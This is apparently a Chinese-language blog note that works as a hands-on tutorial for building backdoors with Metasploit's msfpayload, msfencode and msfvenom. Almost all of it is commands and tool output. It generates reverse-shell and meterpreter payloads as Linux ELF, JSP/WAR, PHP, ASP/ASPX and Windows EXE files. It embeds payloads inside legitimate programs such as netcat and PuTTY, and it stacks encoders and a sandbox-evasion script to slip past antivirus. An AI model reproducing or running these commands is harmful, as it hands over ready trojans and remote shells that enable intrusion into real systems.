文章是以前写的笔记 没有环境做过多的测试. 本文介绍使用msfpayload生成后门,msfencode多payload进行编码处理使其免杀部分杀软.msfpayload与msfencode参数说明执行msfpayload -h查看都有哪些参数 Usage: /opt/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>OPTIONS: -h Help banner -l List available payloads#O--查看payload信息#R--输出raw原始数据,可以被传输到另一个程序如msfencode或重定向到另一个文件#C--输出c程序执行msfencode -h查看都有哪些参数root@bt:/opt/metasploit/msf3# msfencode -h Usage: /opt/metasploit/msf3/msfencode <options> OPTIONS: -a <opt> The architecture to encode as -b <opt> The list of characters to avoid: '\x00\xff' //避免的字符 -c <opt> The number of times to encode the data //编码次数 -d <opt> Specify the directory in which to look for EXE templates -e <opt> The encoder to use //选择使用哪种编码器 -h Help banner -i <opt> Encode the contents of the supplied file path -k Keep template working; run payload in new thread (use with -x) -l List available encoders //列出所有可用的编码器 -m <opt> Specifies an additional module search path -n Dump encoder information -o <opt> The output file //输出文件 -p <opt> The platform to encode for -s <opt> The maximum size of the encoded data -t <opt> The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war //输出文件的格式 -v Increase verbosity -x <opt> Specify an alternate executable template root@bt:/opt/metasploit/msf3# msfencode -l Framework Encoders================== Name Rank Description ---- ---- ----------- cmd/generic_sh good Generic Shell Variable Substitution Command Encoder cmd/ifs low Generic ${IFS} Substitution Command Encoder cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder generic/none normal The "none" Encoder mipsbe/longxor normal XOR Encoder mipsle/longxor normal XOR Encoder php/base64 great PHP Base64 encoder ppc/longxor normal PPC LongXOR Encoder ppc/longxor_tag normal PPC LongXOR Encoder sparc/longxor_tag normal SPARC DWORD XOR Encoder x64/xor normal XOR Encoder x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder x86/avoid_utf8_tolower manual Avoid UTF8/tolower x86/call4_dword_xor normal Call+4 Dword XOR Encoder x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder x86/context_stat manual stat(2)-based Context Keyed Payload Encoder x86/context_time manual time(2)-based Context Keyed Payload Encoder x86/countdown normal Single-byte XOR Countdown Encoder x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder x86/nonalpha low Non-Alpha Encoder x86/nonupper low Non-Upper Encoder x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder x86/single_static_bit manual Single Static Bit x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder生成backdoor类型可以生成asp、aspx、php、jsp、war、exe等多种类型,下面介绍的使用方法就不一一测试了.msfpayload生成linux backdoorroot@bt:~# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.7.102 LPORT=5555 X > linux2Created by msfpayload (http://www.metasploit.com).Payload: linux/x86/shell_reverse_tcp Length: 71Options: {"LHOST"=>"192.168.7.102", "LPORT"=>"5555"}目标机器运行linux2,本机监听下端口,使用metasploit或者nc都行,测试如下图: 

payload与可执行文件绑定运行,如netcat：root@bt:~# msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LHOST=10.0.0.1 LPORT=5555 R | msfencode -a x86 -e x86/alpha_mixed -k -x /bin/netcat -t elf -o nc[*] x86/alpha_mixed succeeded with size 204 (iteration=1)高级点的payload meterpreterroot@bt:~# msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LHOST=10.0.0.1 LPORT=5555 R | msfencode -a x86 -e x86/alpha_mixed -k -x /bin/netcat -t elf -o nc可以使用msfpayload -l | grep linux查找,选择合适自己的.msfpayload生成jsp、war backdoorroot@bt:~# msfpayload java/jsp_shell_reverse_tcp LHOST=10.1.1.1 LPORT=5555 R > door.jsp生成war格式后门root@bt:~# msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=5555 W > door.warCreated by msfpayload (http://www.metasploit.com).Payload: linux/x86/shell_reverse_tcp Length: 71Options: {"LHOST"=>"10.0.0.1", "LPORT"=>"5555"} root@bt:~# unzip door.warArchive: door.war inflating: META-INF/MANIFEST.MF creating: WEB-INF/ inflating: WEB-INF/web.xml inflating: sbkuvbujlbr.jsp inflating: sWDYKoedyqBMERb.txtroot@bt:~#msfpayload生成php backdoorroot@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e php/base64 -t raw -o base64php.php[*] php/base64 succeeded with size 1779 (iteration=1)如果文件开头和结尾木有php的分界符,那么得自己手动gedit/vim base64php.php一下,在头尾加上即可,否则是不成功的.如图: 

msfpayload生成asp、aspx backdoorroot@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86 -t asp -o door2.asp[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86 -t aspx -o door.aspx[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)msfpayload生成exe backdoorroot@bt:~#msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 > /root/Desktop/door.exeroot@bt:~#msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 -k -x /root/putty.exe -o /root/Desktop/puttydoor.exeroot@bt:~#msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 10 X > shell.binroot@bt:~#msfpayload windows/shell/reverse_tcp LHOST=10.0.0.1 LPORT=4443 EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t exe -o door.exemsfpayload tips目标是内网时,常用的payload选着如:root@bt:~# msfpayload windows/meterpreter/reverse_tcp_allports LHOST=192.168.1.6 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -o allports.exeroot@bt:~# msfpayload windows/meterpreter/reverse_http LHOST=192.168.1.6 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -o httpports.exeAntivirus Sandbox Evasion-ultimate-payload.pl$ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 | ./ultimate-payload.pl -t ultimate-payload-template1.exe -o /tmp/payload.exe[*ultimate] Waiting for payload from STDIN[*ultimate] Payload: read (size: 367)[*ultimate] Payload: encode (new size: 1161)[*ultimate] Template: read 94720 bytes from file[*ultimate] Template: found pattern 'MY_PAYLOAD:' at position: 36928[*ultimate] Output: add the begin of the template (size: 36928)[*ultimate] Output: add the encoded payload (size: 1161)[*ultimate] Output: add the end of the template (size: 18502)[*ultimate] File '/tmp/payload.exe' generated (size: 94720)reverse_https with basic authentication against proxymsfvenom -p windows/meterpreter/reverse_https_proxy_basicauth -f exe LPORT=443 LHOST=172.16.99.1 PROXY_AUTH_USER=mylongusername PROXY_AUTH_PASS=mylongpassword123 > /tmp/msf.exe还有对生成的payload加壳处理,如upx.ultimate-payload.pl下载 reverse_https_proxy_basicauth下载ps:这里只是简单的介绍一下如何使用,具体操作还得大家测试,查看shellcode加C参数,如有错误请留言.使用Msfpayload和Msfencode生成backdoor